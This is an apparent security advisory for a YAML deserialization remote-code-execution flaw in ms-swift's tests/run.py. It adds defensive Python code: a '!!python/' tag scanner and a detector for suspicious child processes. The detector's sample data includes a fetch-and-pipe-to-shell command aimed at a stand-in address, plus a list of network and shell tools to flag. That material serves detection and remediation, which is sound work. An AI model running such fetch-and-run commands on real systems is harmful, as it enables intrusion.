CVE-2025-50460
ms-swift · ms-swift project
Executive summary
A critical remote code execution vulnerability has been identified in the ms-swift project, assigned CVE-2025-50460 with a CVSS score of 9.8. This flaw allows an unauthenticated attacker to take complete control of an affected system by sending a specially crafted file. Successful exploitation could lead to total system compromise, data theft, and significant operational disruption.
Vulnerability
The vulnerability exists due to an unsafe deserialization process within the tests/run.py script of the ms-swift project. The script utilizes the yaml.load() function from a vulnerable version of the PyYAML library (e.g., 5.3.1). An attacker can exploit this by providing a malicious YAML file containing embedded Python code. When the tests/run.py script processes this file, the yaml.load() function will deserialize the data and execute the arbitrary code with the permissions of the running application, leading to remote code execution (RCE).
Business impact
This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit would grant an attacker full control over the affected server or application environment. This could lead to severe business consequences, including the theft or destruction of sensitive data, deployment of ransomware, disruption of critical services, and use of the compromised system to launch further attacks against the internal network. The potential for complete system compromise presents a significant risk to data confidentiality, integrity, and availability, potentially causing major financial and reputational damage.
Remediation
Immediate Action:
Immediately update the ms-swift project to the latest patched version as recommended by the vendor. The patched version should replace the unsafe yaml.load() function with its secure alternative, yaml.safe_load(). After patching, it is crucial to monitor systems for any signs of exploitation attempts and review historical access logs for indicators of compromise prior to the patch.
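The following is an added example, not code from the ms-swift project or from the advisory. It shows the two loader choices side by side from a defender's point of view: a pre-load scan that rejects any document carrying PyYAML's Python-specific tags, and a loader wrapper that only ever calls yaml.safe_load(), which constructs nothing beyond the core YAML types. The two config documents are constructed for the example; the `!!python/tuple` tag is a harmless one chosen only to show that safe_load() refuses the whole `!!python/` tag family rather than any particular payload.

```python
import re
from typing import Any

import yaml

# PyYAML-specific tags. yaml.load() without a restricted Loader (the pattern
# described for tests/run.py) lets these construct arbitrary Python objects;
# yaml.safe_load() refuses every one of them with a ConstructorError.
PYTHON_TAG = re.compile(r"!!python/[^\s\[\]{},]+")

# Constructed sample documents (not taken from the project).
BENIGN_CONFIG = """\
model: qwen2-7b
train:
  epochs: 3
  batch_size: 16
"""

TAGGED_CONFIG = """\
model: qwen2-7b
train:
  epochs: !!python/tuple [1, 2]
"""


def find_python_tags(text: str) -> list[tuple[int, str]]:
    """Return (line number, tag) for every !!python/ tag in the document.

    This is a cheap, loader-independent check that can run before any
    parser touches the file, e.g. at upload time or in a CI gate.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in PYTHON_TAG.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


def load_yaml_hardened(text: str) -> Any:
    """Hardened replacement for the unsafe pattern `yaml.load(data)`.

    Rejects documents that carry Python-specific tags up front, then parses
    with yaml.safe_load(), which only builds str/int/float/bool/list/dict.
    """
    tags = find_python_tags(text)
    if tags:
        where = ", ".join(f"line {n}: {t}" for n, t in tags)
        raise ValueError(f"refusing YAML with Python-specific tags ({where})")
    return yaml.safe_load(text)


def safe_loader_rejects(text: str) -> bool:
    """True if yaml.safe_load() itself refuses the document.

    Shows that even without the pre-scan, safe_load() will not construct a
    !!python/ tag; the scan just gives a clearer error and an audit trail.
    """
    try:
        yaml.safe_load(text)
    except yaml.constructor.ConstructorError:
        return True
    return False


if __name__ == "__main__":
    print(load_yaml_hardened(BENIGN_CONFIG))
    print(find_python_tags(TAGGED_CONFIG))
    print("safe_load rejects tagged doc:", safe_loader_rejects(TAGGED_CONFIG))
```

When reviewing a patch for this class of bug, grep for every `yaml.load(` call and confirm each either became `yaml.safe_load(` or passes `Loader=yaml.SafeLoader`; `FullLoader` and `UnsafeLoader` are not acceptable substitutes for untrusted input.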
Proactive Monitoring:
Implement enhanced monitoring on affected systems. Look for suspicious child processes spawned by the application running the ms-swift project, unexpected outbound network connections, and unusual CPU or memory usage. Scrutinize logs for any access attempts or errors related to the tests/run.py script or the processing of YAML files.
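As an added example of the "suspicious child processes" check above (not code from the advisory or the project), the snippet below walks a small, constructed process snapshot and flags any shell or interpreter spawned by a process whose command line references tests/run.py. The event format and the sample processes are invented for the example; in practice the same logic would run over auditd, EDR or `ps`-derived records.

```python
from dataclasses import dataclass

# Binaries a YAML-driven test runner has no reason to spawn. Extend to taste.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "nc", "ncat", "curl", "wget", "perl"}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str       # executable name
    cmdline: str    # full command line


# Constructed snapshot (not real telemetry): a runner that stayed within
# Python, and a second runner that spawned a shell which then ran curl.
SNAPSHOT = [
    Proc(100, 1, "python3", "python3 tests/run.py --run_config config.yaml"),
    Proc(101, 100, "python3", "python3 -m pytest tests/test_model.py"),
    Proc(200, 1, "python3", "python3 tests/run.py --run_config untrusted.yaml"),
    Proc(201, 200, "sh", "sh -c curl http://203.0.113.10/x | sh"),   # RFC 5737 doc address
    Proc(202, 201, "curl", "curl http://203.0.113.10/x"),
]


def suspicious_descendants(procs: list[Proc], marker: str = "tests/run.py") -> list[tuple[int, int, str]]:
    """Return (runner pid, child pid, child comm) for suspicious processes
    descended from any process whose cmdline contains `marker`.

    Walks the full subtree, so curl spawned by a shell spawned by the runner
    is attributed back to the runner that started the chain.
    """
    by_ppid: dict[int, list[Proc]] = {}
    for p in procs:
        by_ppid.setdefault(p.ppid, []).append(p)

    findings = []
    for runner in (p for p in procs if marker in p.cmdline):
        stack = list(by_ppid.get(runner.pid, []))
        while stack:
            child = stack.pop()
            if child.comm in SUSPICIOUS_CHILDREN:
                findings.append((runner.pid, child.pid, child.comm))
            stack.extend(by_ppid.get(child.pid, []))
    return sorted(findings)


if __name__ == "__main__":
    for runner_pid, child_pid, comm in suspicious_descendants(SNAPSHOT):
        print(f"runner {runner_pid} -> suspicious child {child_pid} ({comm})")
```

The check is deliberately narrow: it keys on the script path named in the advisory and a short allow-nothing list of child binaries, which keeps false positives low while still catching the shell-then-download chain that typically follows a deserialization RCE.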
Compensating Controls: If immediate patching is not feasible, implement the following controls:
- Use a Web Application Firewall (WAF) or intrusion prevention system (IPS) with rules to detect and block malicious YAML payloads.
- Strictly limit network access to the application or service utilizing the ms-swift project.
- Implement file integrity monitoring to detect unauthorized changes to the tests/run.py script.
- Isolate the affected system in a segmented network to prevent potential lateral movement.
Exploitation status
Public Exploit Available: true
Analyst recommendation
Given the critical CVSS score of 9.8 and the ease of exploitation, this vulnerability presents an immediate and severe threat. We strongly recommend that organizations prioritize patching all affected instances of the ms-swift project without delay. Although not yet on the CISA KEV list, its critical nature means it is a prime target for opportunistic and sophisticated attackers. Assume the vulnerability is being actively targeted and take immediate action to apply the recommended remediation or compensating controls to mitigate risk.